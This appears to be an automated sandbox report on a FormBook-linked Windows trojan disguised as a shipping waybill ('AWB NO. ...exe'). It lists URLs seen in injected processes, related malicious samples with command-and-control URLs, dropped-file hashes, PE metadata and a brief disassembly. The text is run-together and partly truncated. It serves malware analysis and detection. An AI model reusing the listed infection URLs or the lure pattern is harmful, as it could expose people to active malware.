                                                            https://lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.pngRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/cropped-Lakemont-favicon.png?fit=3RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/cropped-Lakemont-favicon.png?fit=2RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://macphersonspm.appfolio.com/connect/users/sign_injFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/cropped-Lakemont-favicon.png?fit=1jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/custom.js?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.orthonow.livejFlHFdZgIYNZqR.exe, 00000005.00000002.23185812160.0000000000E75000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico45570IH2.4.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/skin-default.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awp-marketing-agency/style.css?ver=6.5.5jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://api.w.org/jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://stats.wp.com/e-202427.jsRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/font-awesome/css/font-awesRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/owl.carousel.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ac.ecosia.org/autocomplete?q=RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/jquery.min.js?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://vintagewins.com/n8dl/?vX=FC28RpcPing.exe, 00000004.00000002.23187811443.0000000004822000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003C62000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6RpcPing.exe, 00000004.00000002.23187811443.0000000003EB6000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000032F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress//assets/js/screen-reader-text.js?ver=RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7cRpcPing.exe, 00000004.00000002.23187811443.0000000003EB6000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.00000000032F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://lakemontbellevue.net/wp-content/uploads/2024/05/Lakemont-Logo-1-1.pngRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/menu.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/all.min.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awp-marketing-agency/assets/css/dark-brown-theme.css?vRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RpcPing.exe, 00000004.00000003.18883512956.0000000007B99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?resize=300%2CRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467058
Start date and time: 2024-07-03 17:31:42 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 17m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: AWB NO. 077-57676135055.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@16/12
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 98%
                                                            • Number of executed functions: 46
                                                            • Number of non-executed functions: 258
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: AWB NO. 077-57676135055.exe
Time | Type | Description
11:35:13 | API Interceptor | 33676564x Sleep call for process: RpcPing.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            66.235.200.145DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                                                            • www.lakemontbellevue.com/ld28/?3Xd=detQRJhNSOte/MMKAeFCHQdrYsI9TT+LmPx5A1J5xMe4V34+sX8EdyBejeqfNCZfKSqZdnV4VnFNmZ4/AzmN1DMS5R4a1wm07eTy015a8TIqAfj/mBukJiQ=&Cdl=szJ4
                                                            INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                            2FcJgghyXg.exeGet hashmaliciousFormBookBrowse
                                                            • www.soccercitycupsc.com/us94/?FV9l7b=S5srMiwBCDtV4rjo3jAT9rEjkkSDttoSOLAmgXzTQBVP9tcOlEr2qFRjTuqDw5Sxe1FF&BbW=QzuhmF0pKL
                                                            ClbrTLBbVA.exeGet hashmaliciousFormBookBrowse
                                                            • www.adornmentwithadrienne.com/ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj
                                                            r5573XLX_Confirming_685738_Permiso.vbsGet hashmaliciousFormBookBrowse
                                                            • www.shivanshnegi.com/hb6q/?kF=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==&LPW33a=EJ_Y5C3RY2AMjvtQ
                                                            BBVA-Confirming_Facturas_Pagadas_al_Vencimiento.vbsGet hashmaliciousFormBookBrowse
                                                            • www.shivanshnegi.com/hb6q/?3t-_2h=lQe4u&_30_T=SLfnpSH8JFkD4JBvPgRq/MrmccQ0IKCWuyGgdNK0iEg51HeS6g2oNSkb61BOtzoBwxfmw1AFCol6MwSDOKA9DD+yD/DKRM1OfQ==
                                                            GlobalImagingDocuments9575734549684.vbsGet hashmaliciousFormBookBrowse
                                                            • www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb
                                                            0ySMPNiDoA.exeGet hashmaliciousFormBookBrowse
                                                            • www.theunstoppabletravelers.com/a19i/?4hkT=rLtsLZhSdQwFRkvaG8FjiaGEB8J9o/aSV6LeKN0wyHa1R2N5aTBKUDHw+apOLNME5B3p&aHzLRr=9rl0dna
                                                            6014853.exeGet hashmaliciousFormBookBrowse
                                                            • www.firepowerexpo.com/f649/?Ih3=m1lqWHCBQ/kUfIId9G1Zl7+cXxQgMOESuv3uKkpy1j9VjbvHsanxuQVfMZjTZucRw3bqX9o71XHJz8Ptxs35IAYHht5fw0SXRQ==&FTBSzg=_AtxeQJqoYkM5z7B
                                                            DHL Consignment Details_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.atwatercab.com/s20g/?x8b=8pNLsfJxhBPPAD4P&d48PB=rZ/46zgpbKJOe2X3A4FYFLQg1vAXxuRWnT2LQvG1tr3ZSe4vYgV8EIvoDLg6imzOZAE7E347lg==
                                                            203.161.50.127PAYROLL.docGet hashmaliciousFormBookBrowse
                                                            • www.evolveenterprises.top/ro6r/?dJqp=o4zmNqBJYlNtN0UyHUxno7qBCaLAqrJphLcgIRpT4n8ozC/7e7pDBEqM2Rd+uJTS6EPOWI0i7oPhIrHAygO87MqHngSCYYqQB9vq6D9ICnr41afOJLQGIeUNryzh&WnF4=YlbDSxW
                                                            yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
                                                            • www.quantummquest.top/0hhg/
                                                            EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                            • www.quantummquest.top/0hhg/
                                                            n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
                                                            • www.quantummquest.top/0hhg/
                                                            tee030.docGet hashmaliciousFormBookBrowse
                                                            • www.quantummquest.top/0hhg/
                                                            Inquiries_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • www.titantechnologies.life/gh9e/
                                                            ALL-LINK DRAFT_gz.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.radiantresources.xyz/9q39/
                                                            fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                            • www.radiantresources.xyz/r6ib/
                                                            KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                            • www.titantechnologies.life/gh9e/
                                                            Process:C:\Windows\SysWOW64\RpcPing.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):122880
                                                            Entropy (8bit):1.1414673161713362
                                                            Encrypted:false
                                                            SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                            MD5:24937DB267D854F3EF5453E2E54EA21B
                                                            SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                            SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                            SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Process:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):286208
                                                            Entropy (8bit):7.992791969913571
                                                            Encrypted:true
                                                            SSDEEP:6144:uwkTDIirbOKJhK54lLH70h/AiC2gCryJtTdYL7owG+8tEw:bwxRhU4x8tnmJbW7oAoEw
                                                            MD5:269F6A1274A6B8CCB02A4A704F7B16AF
                                                            SHA1:D5E926F5213FBEC4C8E285EDA22EAFE920822646
                                                            SHA-256:20A7818AB406DC49055B355F60FDF7F70687C2090FFBDDDDE2E346E543BB5776
                                                            SHA-512:F4EDEF7F71B285F3904A8BEAFAEF35C3DAE6F5CD812025F4FE9E3BD7EE2AD51FAE068A5DDBBB9E3ECD0F9D574FACFD0A1CCA5B250896CF50B52B3EC62094AC1E
                                                            Malicious:false
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            File Type:ASCII text, with very long lines (28756), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):28756
                                                            Entropy (8bit):3.591296839010836
                                                            Encrypted:false
                                                            SSDEEP:768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+IC6bd4vfF3if6gyu9:miTZ+2QoioGRk6ZklputwjpjBkCiw2RR
                                                            MD5:0A5372B7F3DDDDF819A63558F28BA762
                                                            SHA1:8C03B485BCAA0C8D54D1595981A7DFF100F5ED0B
                                                            SHA-256:1DB6A57B2846A9C4D47C5F2BA9E9F7FA2FCE56AAAED5D5FE7984E0AAA9BDB8C0
                                                            SHA-512:EB04606B433E49E84205C8D227828EECBCF175F76CCD67E5A8371B604847E7A20D00EB9AC7E5577675E25497CD890E43C7616D42FCA15E02B0AA0F180A57BFF5
                                                            Malicious:false
                                                            Reputation:low
                                                            Process:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):286208
                                                            Entropy (8bit):7.992791969913571
                                                            Encrypted:true
                                                            SSDEEP:6144:uwkTDIirbOKJhK54lLH70h/AiC2gCryJtTdYL7owG+8tEw:bwxRhU4x8tnmJbW7oAoEw
                                                            MD5:269F6A1274A6B8CCB02A4A704F7B16AF
                                                            SHA1:D5E926F5213FBEC4C8E285EDA22EAFE920822646
                                                            SHA-256:20A7818AB406DC49055B355F60FDF7F70687C2090FFBDDDDE2E346E543BB5776
                                                            SHA-512:F4EDEF7F71B285F3904A8BEAFAEF35C3DAE6F5CD812025F4FE9E3BD7EE2AD51FAE068A5DDBBB9E3ECD0F9D574FACFD0A1CCA5B250896CF50B52B3EC62094AC1E
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\AWB NO. 077-57676135055.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):9840
                                                            Entropy (8bit):7.600122076467165
                                                            Encrypted:false
                                                            SSDEEP:192:65jwEiqxwzMZTG3c6Vg0X9O1JZUv3QfyYxvoIMnxb1/9Zmss7Eg5L8p7e+ZEXP:I6qxwzMZy3QU9Obysvojx5fm+G0U
                                                            MD5:33D117459E16755B694CA5687287AA0E
                                                            SHA1:3E1CA739F706A336A6C2C0DDE362831378A6AEDC
                                                            SHA-256:573415479CB805C43F597D019C685F5E6F16F15F8D3CE153095B850359553950
                                                            SHA-512:9C29646229D0BA98B5EF189D000CEC4457B3E5BF175EB59DB98A2940631A5C47F490E7D4A6516B727C06B326974FB63E120C0F5BBE5371BE39ED2790772DE70B
                                                            Malicious:false
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.134244971800032
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:AWB NO. 077-57676135055.exe
                                                            File size:1'182'720 bytes
                                                            MD5:d0aa9dae95ef6311340a157817230bf0
                                                            SHA1:80019b077b5c1ded0b6485443100c66e94d92e3a
                                                            SHA256:089fa75d9d15b2c8abbaf0daf126b72c8e22dbddb31f56e50f4a19c90065b10f
                                                            SHA512:db4f9fbef67a609c385c84200f943cd1613122711130a1d2ae04dcece7b156b9df64c22230934cc44b358ac5c4357f406afd06c696db198fc7dafa603a852890
                                                            SSDEEP:24576:3AHnh+eWsN3skA4RV1Hom2KXMmHah+tMVkGWioush1i75:qh+ZkldoPK8Yah++DWDu
                                                            TLSH:A845BE02B3D5D036FFAB92739B6AF60156BC79254123852F13981DB9BD701B2223E763
                                                            Icon Hash:aaf3e3e3938382a0
                                                            Entrypoint:0x42800a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x668532B9 [Wed Jul 3 11:15:05 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                            Instruction
                                                            call 00007F7248B9041Dh
                                                            jmp 00007F7248B831D4h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007F7248B8335Ah
                                                            cmp edi, eax
                                                            jc 00007F7248B836BEh
                                                            bt dword ptr [004C41FCh], 01h
                                                            jnc 00007F7248B83359h
                                                            rep movsb
                                                            jmp 00007F7248B8366Ch
                                                            cmp ecx, 00000080h
                                                            jc 00007F7248B83524h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007F7248B83360h
                                                            bt dword ptr [004BF324h], 01h
                                                            jc 00007F7248B83830h
                                                            bt dword ptr [004C41FCh], 00000000h
                                                            jnc 00007F7248B834FDh
                                                            test edi, 00000003h
                                                            jne 00007F7248B8350Eh
                                                            test esi, 00000003h
                                                            jne 00007F7248B834EDh
                                                            bt edi, 02h
                                                            jnc 00007F7248B8335Fh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007F7248B83363h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007F7248B833B5h
                                                            bt esi, 03h
                                                            Programming Language:
                                                            • [ASM] VS2013 build 21005
                                                            • [ C ] VS2013 build 21005
                                                            • [C++] VS2013 build 21005
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2013 UPD5 build 40629
                                                            • [RES] VS2013 build 21005
                                                            • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x565c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11f000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x565c4 | 0x56600 | 09a0316e32a7b582eb07e1e6fb078c2b | False | 0.9244273471418234 | data | 7.885535704113852 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11f000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd07b8 | 0x4d88a | data | | | 1.000333776269137
RT_GROUP_ICON | 0x11e044 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11e0bc | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x11e0d0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x11e0e4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x11e0f8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11e1d4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
